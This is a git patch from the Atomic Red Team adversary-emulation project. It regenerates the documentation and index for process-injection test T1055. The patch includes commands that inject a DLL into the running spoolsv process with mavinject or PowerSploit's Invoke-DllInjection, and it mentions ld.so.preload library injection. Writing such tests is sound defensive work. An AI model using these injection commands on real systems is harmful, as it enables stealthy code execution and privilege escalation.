From ddadfbb3bfb46651f4fb2c1649e1a7071be9f011 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 14 Nov 2019 22:57:31 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1055/T1055.md | 12 +++++++-----
 atomics/index.yaml     | 42 ++++++++++++++++++++----------------------
 2 files changed, 27 insertions(+), 27 deletions(-)

diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index a9541690..a3635fd5 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -50,11 +50,12 @@ Windows 10 Utility To Inject DLLS
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055\src\x64\T1055.dll|
-| process_id | PID of input_arguments | Int | $pid|
+| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
 
 #### Run it with `powershell`!  Elevation Required (e.g. root or admin) 
 ```
-mavinject #{process_id} /INJECTRUNNING #{dll_payload}
+$mypid = #{process_id}
+mavinject $mypid /INJECTRUNNING #{dll_payload}
 ```
 
 
@@ -72,11 +73,12 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | dll_payload | DLL to Inject | Path | T1055.dll|
-| process_id | PID of input_arguments | Int | $pid|
+| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
 
 #### Run it with `powershell`!  Elevation Required (e.g. root or admin) 
 ```
-Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
+$mypid = #{process_id}
+Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
 ```
 
 
@@ -85,7 +87,7 @@ Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
 <br/>
 
 ## Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload
-This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
+This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. 
 
 **Supported Platforms:** Linux
 
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 73018afb..acdee72d 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -9640,13 +9640,13 @@ defense-evasion:
         process_id:
           description: PID of input_arguments
           type: Int
-          default: "$pid"
+          default: "(get-process spoolsv).id"
       executor:
         name: powershell
         elevation_required: true
-        command: 'mavinject #{process_id} /INJECTRUNNING #{dll_payload}
-
-'
+        command: |
+          $mypid = #{process_id}
+          mavinject $mypid /INJECTRUNNING #{dll_payload}
     - name: Process Injection via PowerSploit
       description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
 
@@ -9661,19 +9661,18 @@ defense-evasion:
         process_id:
           description: PID of input_arguments
           type: Int
-          default: "$pid"
+          default: "(get-process spoolsv).id"
       executor:
         name: powershell
         elevation_required: true
-        command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
-
-'
+        command: |
+          $mypid = #{process_id}
+          Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
     - name: Shared Library Injection via /etc/ld.so.preload
-      description: 'This test adds a shared library to the `ld.so.preload` list to
+      description: "This test adds a shared library to the `ld.so.preload` list to
         execute and intercept API calls. This technique was used by threat actor Rocke
         during the exploitation of Linux web servers. This requires the `glibc` package.
-
-'
+        \n"
       supported_platforms:
       - linux
       input_arguments:
@@ -13005,13 +13004,13 @@ privilege-escalation:
         process_id:
           description: PID of input_arguments
           type: Int
-          default: "$pid"
+          default: "(get-process spoolsv).id"
       executor:
         name: powershell
         elevation_required: true
-        command: 'mavinject #{process_id} /INJECTRUNNING #{dll_payload}
-
-'
+        command: |
+          $mypid = #{process_id}
+          mavinject $mypid /INJECTRUNNING #{dll_payload}
     - name: Process Injection via PowerSploit
       description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
 
@@ -13026,19 +13025,18 @@ privilege-escalation:
         process_id:
           description: PID of input_arguments
           type: Int
-          default: "$pid"
+          default: "(get-process spoolsv).id"
       executor:
         name: powershell
         elevation_required: true
-        command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
-
-'
+        command: |
+          $mypid = #{process_id}
+          Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
     - name: Shared Library Injection via /etc/ld.so.preload
-      description: 'This test adds a shared library to the `ld.so.preload` list to
+      description: "This test adds a shared library to the `ld.so.preload` list to
         execute and intercept API calls. This technique was used by threat actor Rocke
         during the exploitation of Linux web servers. This requires the `glibc` package.
-
-'
+        \n"
       supported_platforms:
       - linux
       input_arguments: